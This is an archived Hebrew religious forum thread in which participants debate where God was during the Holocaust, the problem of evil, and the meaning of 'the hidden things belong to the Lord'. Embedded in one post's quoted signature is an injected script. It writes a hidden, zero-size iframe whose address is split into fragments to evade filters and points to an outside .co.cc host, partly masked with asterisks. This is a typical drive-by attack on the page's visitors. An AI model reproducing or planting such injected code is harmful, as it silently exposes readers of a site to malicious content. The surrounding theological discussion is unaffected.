| נשלח ב-15/9/2014 00:35 |
|
| |
הנסתרות לה' אלקינו-איפוה אלקים היה בשואה ?
פרשת נצבים
אחר סיום תיאור חורבן הארץ בדור האחרון וסיבתו בא הסיום "הנסתרות לה' אלוקינו והנגלות לנו ולבנינו עד עולם לעשות את כל דברי התורה הזאת"
וכבר נאמרו הרבה ביאורים בעניין ערבות ועוד ופשוטו של מקרא שמעתי
אחר שפורש שהארץ חרבה מפני שעזבו את ברית ה' וגו' יעלה על לב אדם ספק שהרי ראינו (גם) ארצות שלנו שחרבו וכדו' אף כששמרנו מצוותיו ומה בצע כי שמרנו משמרתו וכשאלת אסף וחבקוק ואיוב ועוד
על זה סיימה תורה הנסתרות לה' אלקינו = לא הכל אנו מבינים, ומכל מקום הנגלות לנו ולבננו עד עולם לעשות את כל דברי הזאת = שזה גלוי וידוע לנו שהוא סיבה לברכה וקללה.
|
|
|
|
| נשלח ב-15/9/2014 08:00 |
|
| |
בער
ברוך הבא אל הפורום!
כמדומה שצריך לתקן את הכותרת. לא רק "איפה אלקים היה בשואה" אלא "איך שומרים מצוות לאחר השואה" ו"איך נשארים יהודים מאמינים לאחר השואה".
ובזה יפו דבריך.
אבאר: יש כאן מצוקה אמונית ולוגית. אם כי עיון קל יראה לנו שזו דוגמה ממה שמכנים בפילוסופיה ובתיאולוגיה "בעית הרע".
כך:
א. אלוקים טוב וגומל לאיש כמפעלו.
ב. היתה שואה.
ג. אלוקים לא היה אמור לאפשר לשואה לקרות.
האם אפשר ליישב את כל הסעיפים האלו יחד?
הפתרון שלך הוא להודות מראש שכל הסעיפים אכן נכונים, אבל ניתן להימנע מן המסקנה שצריך לוותר על אחד מהם. יש דברים שהם בחינת "נסתרות".
וכמובן הדברים כבר נאמרו, ואני יכול להפנות לדברי ר' נחמן מברסלב שיש שאלות שהן בחינת "חלל ריק" ולכן אין להם תשובה באופן עקרוני.
מה שאתה הוספת הוא לעגן את הדברים בפשט הפסוק. לפי קריאתך, ה' כבר מודיע לנו שיהיו דברים שלא נבין, ואעפ"כ נישאר עם התורה והמצוות.
כל זה נפלא ביותר. ואמנם יש להעיר שתי הערות.
1. האמנם אנו מסוגלים לכך? כמובן, מי הם "אנו"? האם אתה ואני? קוראי וחברי הפורום? יהודים בכלל? דומה בעיני שאין המצוקה - הקיומית והפסיכולוגית - של ניצול שואה או צאצא ישיר של ניצולי שואה כמצוקתו של מי שקורא על כך בספרי ההיסטוריה או שומע סיפורים רחוקים.
2. האם זו היתה דרכם של חז"ל, להסתפק באמירה כמו זו שלך - עד כמה שהיא חכמה ואמיתית?
האם לא מצאנו מדרש שמתאר את הקיצוץ שקיצצו נביאים בשבחי השם כיון שלא ראו שהם מתקיימים לנגד עיניהם - עד שנמצאה פרשנותם של אנשי כנסת הגדולה? היכן גדולתו, היכן נוראותיו, שאלו ולפי המדרש אף מחקו תארים אלו מן התפילה. כמובן, מסתבר שהמדרש אינו מתאר אירוע היסטורי. תפילת 18 לא היתה קיימת בימי הנביאים. אולם השאלות היו קיימות בכל הדורות, והתשובה של הנביאים, לפי המדרש, לא היתה לוותר על אמונה בה' ואף לא על התורה והמצוות, אבל בהחלט לוותר על אמירת סעיף של תארי ה' - שבחי ה'. אי אפשר ואין זה נכון לדרוש מן האדם לשבח את ה' על מה שאינו יכול לשאת לחשוב עליו. כך זה מצטייר לקורא אשר כמוני.
הווה אומר: הנסתרות לה' אלוקינו, אבל בד בבד מי שנמצא שם, בקושיה, אכן יתקשה להתפלל. ויתכן שאכן תפילתו תהיה שונה. ולא ייתבע ממנו משהו אחר.
|
|
|
|
| נשלח ב-15/9/2014 09:08 |
|
| |
מיימוני אתה יכול להביא דוגמא לשאלה שהיא לא מחלל ריק?
|
|
|
|
| נשלח ב-15/9/2014 10:07 |
|
| |
"מִכֹּל חַטֹּאתֵיכֶם לִפְנֵי ה" תִּטְהָרוּ (ויקרא טז, ל), עברות שבין אדם למקום, יום הכיפורים מכפר. עברות שבין אדם לחברו, אין יום הכיפורים מכפר, עד שֶׁיְּרַצֶּה את חברו". מעבר לבין אדם לחברו, כולנו רגילים אנו מבית הורינו לבקש מחילה מהורינו שמא לא קיימנו כדבעי חובותנו של כיבוד וכו'. לפעמים גם בישיבות מצינו מהלך דומה מול הרבנים.
ולא מצאתי בשום מקום בקשת מחילה מהכיוון השני. הרי פשוט הוא שגם אב יכול לחטוא כלפי בנו ורב כלפי תלמידו – כולנו בני אדם סוף כל סוף. אבל לא מצאתי שהורה או מורה צריך לבקש מחילה. ואין לטעון שכמו בקריאת שמע על המיטה (הריני מוחל וסולח) מכסה מקרים אלה כי גם היה בכך לכסות מקרים שבין אדם לחברו וראינו ששם דווקא צריך לרצות את חברו בפועל ממש.
לכאורה יש בכך אולי על דרך והשיב לב אבות על בנים וכו' סליחה הדדית בין אבות ובנים תתכן רק באחרית הימים. ושוב נראה לי לא נכון כי הרי אנו מבקשים מחילה מהורינו. הייתכן שאנו ניגשים ליוה"כ כאשר חטאנו כלפי ילדנו ותלמידנו עומדים ללא פתרון?? האם ההירארכיה של הכבוד של הורים ומורים מונעת כפרה מכולנו?
מדוע אני מבלבל את המוח בעניין מה יום הכיפורים מכפר באשכול זה? הרי אנחנו מתוודים ושופכים את ליבנו לפני אדון עולם על החטאים שלנו. האם אנחנו סולחים לו על שלו? האם כדרכם של אבות ומורים, גם שם הסליחה מעוכבת ממשחקי כבוד?
דווקא מצאתי התייחסות לסליחה כלפי שמיים בסיפור חסידי ודווקא אצל אחד הצדיקים היותר יצירתיים. הסיפור מפורסם, אבל בכ"ז אביאו. פעם אחת בערב יום הכיפורים שהה רבי לוי יצחק ולא ניגש אל העמוד לומר "כל נדרי". התהלך בבית התפילה לכאן ולכאן, והנה ראה איש אחד יושב בפינה על הארץ ובוכה. על שאלת הרבי לסיבת בכיו השיב האיש: "היאך לא אבכה? עד לפני זמן קצר היה לי כל טוב, ועכשיו הנני גלמוד. רבי, ישבתי בכפר, ולא עבר איש רעב על פתח ביתי בלי לאכול אצלי לשובע, אשתי היתה רגילה לאסוף הביתה את הנודדים המסכנים ולדאוג להם. ועתה בא הוא" – ובדברו הראה באצבעו כלפי השמים - "ולקח ממני את האשה פתאום לפתע, וזה עדיין מעט לו, והנה שרף את ביתי, ואני נשארתי עם ששה ילדים קטנים, בלא אשה ובלא בית, וסידור עבה היה לי, שבו נמצאו כל הזמירות כסדרן ולא היה צריך לחפש שום תפילה, והנה נשרף הסידור. ועתה יאמר הרבי בעצמו, כלום יכול אני לסלוח לו"? ציווה הצדיק לבקש סידור כמו זה שתיאר לפניו, כשהביאו לאיש את הסידור. התחיל הופך דף אחרי דף, לראות אם הכל נמצא כסידרו, והצדיק עמד והמתין לו. אחר-כך שאל אותו: "האם אתה סולח לו עתה"? "כן, אמר האיש". מיד ניגש הרבי אל העמוד והתחיל "כל נדרי".
ואיני נכנס כלל לעמקו של הסיפור, אלא רק לרעיון של סליחה במעלה ההירארכיה של הכבוד. אני קטנתי מלסלוח על דברים כמו אלה של בעל האשכול. איני יודע גם אם אנשים כמו השפע חיים סלחו. אבל אני יודע שהם התנחמו בו. אם תשאלו אותם, הם ישיבו בפשטות שהוא היה שם, איתם.
שאלות כמו למה הוא לא מנע הם שאלות של סיבתיות ומוסר ולגבי שאלה זו שייך לסלוח (או שלא). אבל אפשר גם לשאול את השאלה כשאלה אקסיסטנציאליסטית שעליה פרט מסויים שהיה שם יכול להשיב כן או לא.
תוקן על ידי yerubaal ב- 15/09/2014 10:08:26
 |
|
|
|
|
| נשלח ב-15/9/2014 10:23 |
|
| |
בספרו של הרב טייכטל מחסידי הרבי מ מונקאש וראש הישיבה שלו,- אנטי ציוני הרבה יותר מסאטמר- כתב את ספרו -אם הבנים- כשהתחבא בעליית גג בבודפשט.
הוא מספר- שואלים אותי יהודים, איפה הריבונו ל עולם? איפה הקב"ה הרחמן. והוא משיב להם- הקב"ה יושב במטה הגאסטאפו בבודפשט ומיעץ לנאצים איך להשמיד אותנו!
כל מי שאומר או חושב שאלוקם לא ידע או לא רצה לדעת על השואה הוא כופר בה' ובאלוקים.
|
|
|
|
| נשלח ב-15/9/2014 10:24 |
|
| |
ירובעל ראה
תוקן על ידי בעלבעמיו ב- 15/09/2014 10:25:11
|
|
|
|
| נשלח ב-15/9/2014 10:49 |
|
| |
בעל
שיטת ר' נחמן ודאי ראויה לעיון באשכול בפני עצמה.
במקום לתת דוגמא לשאלה שהיא לא כזו, אנסה לאפיין מה המשותף לשאלות של החלל הריק. אולי זה שהן כולן מעניינות. יותר מכך, שהן כולן "אחרונות" ו"יסודיות" באופן שיתבאר ויודגם לקמן.
בפילוסופיה או בכלל כבני אדם אנו נוהגים להציג את השאלה "למה". השאלה הזו בשימוש הלשון הרגיל מחפשת תכלית, יעד שלשמו נעשו או קרו דברים.
הנה שלוש דוגמאות:
למה אתה הולך לבית הספר? כדי ללמוד.
למה אתה אוכל גלידה? כדי להתענג.
למה ה' ברא את העולם?
השאלה הראשונה מציגה שרשרת יעדים ומעשים. השרשרת יכולה להיות סופית או לא (למה ללמוד? כדי להיות מסוגל לפרנס את עצמי? זה יעד משני שגם עליו יש לשאול למה. כדי להיות אדם טוב יותר - זה כמו הסוג השני לקמן).
אכילת גלידה כדי להתענג היא תכלית לעצמה. אפשר לטעון שאין טעם בשאלה "אבל למה להתענג".
השאלה השלישית מנסה לחפש יעד במקום שאולי לא לגיטימי לחפש אחריו (אם כי יש תשובה, אפלטונית אבל לא רק, "כדי להיטיב עם הברואים").
נראה לי ששאלות של תכלית חייבות להסתיים מתי שהוא, ואז זה נראה שרירותי.
מסתבר ששאלות לגבי האלוקים תמיד יובילו לתשובות סותרות ופרדוקסליות ולכן גם הן יסווגו במקום זה.
מסתבר לי יותר מכך: גם במדע אנו איננו שואלים עוד "למה" אלא "איך". אנו מקבלים את העולם כנתון ורק מנסים לזהות חוקיות בתוכו. החוקיות היא כזו ולא אחרת. מישהו בתולדות הפילוסופיה המודרנית בישראל טבע את המונח "ככות" מלשון ככה. הנסיון לחפש את ה"למה" מאחורי ה"ככה" אף הוא יכול להחשב כשאלה על מה שמסתתר שם בחלל הריק.
|
|
|
|
| נשלח ב-15/9/2014 11:22 |
|
| |
מיימוני האם אין מקום להבדיל בין שאלות שהם על מה שלפנים ומה שלאחור, לבין דרכי ה' שאנו אמורים להדבק בהם? או שכפי שמאן דהו ניסח בצורה פרדוקסלית, והלכת בדרכיו, מה הוא אינו מובן, אף אתה היה בלתי מובן.
|
|
|
|
|
| נשלח ב-15/9/2014 12:06 |
|
| |
| מיימוני כתב: |  |
אבאר: יש כאן מצוקה אמונית ולוגית. אם כי עיון קל יראה לנו שזו דוגמה ממה שמכנים בפילוסופיה ובתיאולוגיה "בעית הרע".
כך:
א. אלוקים טוב וגומל לאיש כמפעלו.
ב. היתה שואה.
ג. אלוקים לא היה אמור לאפשר לשואה לקרות.
האם אפשר ליישב את כל הסעיפים האלו יחד?
_______________ שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");> |
|
מיימוני
מה דעתך להוסיף סעיף נוסף: אלקים נתן לנו שכל ולא השתמשנו בו?
הרי היה לנו נסיון של אלפים שנות גלות, איך לא למדנו כלום?
|
|
|
|
| נשלח ב-15/9/2014 12:48 |
|
| |
שוב חוזרים לשאלה הנדושה הזאת ? המאמין יגיד שהקללות נאמרו בתורה. אז הם התקיימו אחת לאחת בשואה. ואם השאלה על איזה חטא? על איזה חטא? האם לא היו עוונות בעולם היהודי? היו. אז יצא הקצף.
והרי הקב"ה כבר החריב בזמן המבול עולם שלם ללא השאר שריד ופליט. אחרי השואה לפחות נשארו שרידים. אז לפחות בשואה מדת הרחמים התערבה.
|
|
|
|
| נשלח ב-15/9/2014 12:51 |
|
| |
בעל
בהחלט!
האם אמרתי אי פעם אחרת?
שלישישי
כתבת
מה דעתך להוסיף סעיף נוסף: אלקים נתן לנו שכל ולא השתמשנו בו? תחילה חשבתי שאתה מדבר על אי שימוש בכישורים השכליים שלנו שאולי נכשלתי בכך במה שכתבתי. ואני סברתי שדווקא כן נזהרתי מאד בשימוש בכלים אלו עד כמה שהם מצויים לי.
אחר כך חשבתי שאולי כוונתך לשאלה הבאה שלך שנועדה להסב את האחריות לשואה מן ה' אל האדם. אני מטפל בכך לקמן.
הרי היה לנו נסיון של אלפים שנות גלות, איך לא למדנו כלום? אם כוונתך לומר שהאדם הביא על עצמו את השואה בבחירתו, וכפי שהבל לא חטא לקין אבל נרצח על ידו, וה' לא התערב, כך בכל מקום - אתה צודק.
אם שאלתך היא על עם ישראל, הרי כמדומה (ושלא כדעת מיכי שלנו) אין דבר כזה, עם ישראל. יש אנשים פרטיים. אתה, אני ועוד, כולל בימים עברו. למי יש ראיה מספיק רחבה כדי לחשוש משואה? יתכן אמנם שהיו מנהיגים שטעו. אבל האם אפשר להאשים אותם (כולל האדמור שברח ואמר להישאר?)? האם היום מישהו מזהיר לעזוב את הארץ כי אולי יום אחד האיראנים יזרקו עלינו פצצת אטום ח"ו?
נוסף לכל זאת, הציפיה שבאה לידי ביטוי בשאלתו של פותח האשכול היא שלמרות שיש בחירה חופשית, עדיין אנו מצפים מה' שיתערב באופן ניסי גלוי או נסתר כדי למנוע דברים כמו השואה, ולכן השאלות.
|
|
|
|
| נשלח ב-15/9/2014 14:43 |
|
| |
לא התכוונתי לשאול שאלה על מקרה ספציפי וגם לא לחפש תירוצים אלא לציין את מה שכבר ידוע - שהמאמין בתוצאות מפני קיום רצון ה' עדיין אינו מבין הרבה דברים ברוח זו - שזה [שלא יודעים] כבר כתוב בתורה
|
|
|
|
| נשלח ב-15/9/2014 15:22 |
|
| |
התורה לא מבחינה בין נסתרות לבין נגלות. משום מה אין לנו בעייה לפענח מה השם רוצה מאיתנו - הרי כתבנו על כך ספריות שלימות וזה ללא החומרות אפילו. רק כשזה מגיע להצדקה מדוע עלינו בכלל לקיים את חלקנו בברית - או אז אלה נסתרות שלא ניתן להבין. רק לי נראה שהמשחק כאן קצת מכור?
|
|
|
|
| נשלח ב-15/9/2014 15:26 |
|
| |
איזה נסתרות? הכל כתוב והכל גלוי.
|
|
|
|
| נשלח ב-15/9/2014 15:27 |
|
| |
אפרים
איקון ירוק של הסכמה.
אכן פרשת הקללות התאמתה לפחות בחלקיה ממש על דרך הפשט.
מן המבול אין ראיה. שהרי יש לנו הבטחה בצד הפרשה שהדברים לא יישנו.
ואכן יש מקום לשאול: מדוע השואה זו שאלה בניגוד לאסונות אחרים, בניגוד לחיי יום יום. וכי אין אסונות פרטיים קשים, ה' ירחם? כך לפחות אני רואה את הדברים. אבל אני גם סבור שרק מי שלא חי ועבר את הדברים, או שהוא מנותק מהם רגשית, מסוגל להעלות את השאלה שלי הזו.
מה היה מיוחד בשואה? דומה שהתשובה היא הרשע האנושי. והתחושה שלנו שיש דברים שה' אמור לשמור שהם לא יקרו.
אבל אני מסכים עם סיפורו של ירוחם (שמסופר כמדומה לא בפעם הראשונה). ה' שלח את המענישים. והרי הדברים כבר כתובים בספרי הנביאים. עלינו להיזהר.
וזה כמובן מוביל לשאלות אחרות, שאמנם הן נכונות פילוסופית אבל הן קבילות בהחלט בעיני המקרא. כפי שמייחסים לר' לוי יצחק מברדיטשב, האמנם עולם טוב הוא זה שבו יש כה הרבה סבל, ומקום לטעות, ומקום להרשיע? השואה חמורה מפני שהיא חורגת מכל הרוע ה"רגיל". אבל גם הרוע "הרגיל" הוא שאלה.
ודברי חברנו החדש מזכירים לנו שזו שאלה שאפשר לחלוק לה מחמאה - מפוקפקת מבחינה רציונלית. המחמאה היא שזו שאלה כה טובה עד שעלינו לדחוק אותה למחלקת הדברים הנסתרים שצריך להשלים עם קיומם ולייחס אותם לה' בלי שאלות נוספות.
|
|
|
|
| נשלח ב-15/9/2014 15:40 |
|
| |
התורה מבחינ ומחינה, מורי הדרך שלנו מסלפים את משמעות הפסוק.
דברים פרק כט
(כח) הַנִּסְתָּרֹת לַיקֹוָק אֱלֹהֵינוּ וְהַנִּגְלֹת לָנוּ וּלְבָנֵינוּ עַד עוֹלָם לַעֲשׂוֹת אֶת כָּל דִּבְרֵי הַתּוֹרָה הַזֹּאת: הפסוק בעצם אומר בפרוש, אל תתחיל לחפש נסתרות בדרכי ה'.והצדוק או מחשבות עמוקות בדרכי ה', תתעסק רק בניגלות, מה שאתה רואה ומבין, ותסיק מסקנות בהתאם. משה רבנו, אמר בפרוש לה' למה הרעות לעמיך? הוא לא חשב על דברים נסתרים, רעה כואב צועקים. ירמיהו - כינה את אלוקים לחיה רעה, דב אורב במסתרים.
|
|
|
|
|